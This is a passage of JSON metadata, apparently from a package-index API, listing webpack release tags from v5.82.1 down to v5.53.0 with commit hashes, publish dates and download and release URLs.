name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url"